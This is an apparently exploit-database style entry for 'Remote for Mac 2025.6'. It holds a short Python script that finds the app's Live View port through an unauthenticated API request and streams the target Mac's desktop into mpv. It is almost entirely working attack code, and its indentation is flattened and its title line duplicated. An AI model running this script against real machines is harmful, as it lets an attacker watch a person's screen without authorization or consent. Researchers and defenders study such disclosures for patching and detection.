# Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop # Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream
Exploit
# Date: 2025-05-27
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6
#!/usr/bin/env python3

'''
Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit
Vulnerable Component: Helper app Live View feature (raw H264 over TCP)
Live View H264 per default is enabled.

- Works when "Allow unknown devices" setting is enabled (default: disabled)
- mpv required
'''

import requests, subprocess, urllib3, sys, time
urllib3.disable_warnings()

def p(s):
try:
i,p=s.split(':'); return i, int(p)
except:
print("Usage: python live.py <IP:PORT>"); sys.exit(1)

def port(i,pt):
try:
r=requests.get(f"https://{i}:{pt}/api/getVersion",
headers={"X-LiveView":"fixed"}, verify=0, timeout=5)
return r.json().get('liveview.port')
except:
return None

def mpv(i,p):
print("Streaming...")

process = subprocess.Popen(['mpv', '--no-terminal',
'--profile=low-latency', '--hwdec=auto', '--untimed', '--no-cache',
'--osc=no', '--title=Remote for Mac Stream Exploit', f'tcp://{i}:{p}'])
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
process.terminate()


if __name__ == "__main__":
if len(sys.argv)!=2: print("Usage: python live.py <IP:PORT>");
sys.exit()
i,pt = p(sys.argv[1])
if (lp:=port(i,pt)): mpv(i,lp)
else: print("Error: No LiveView port")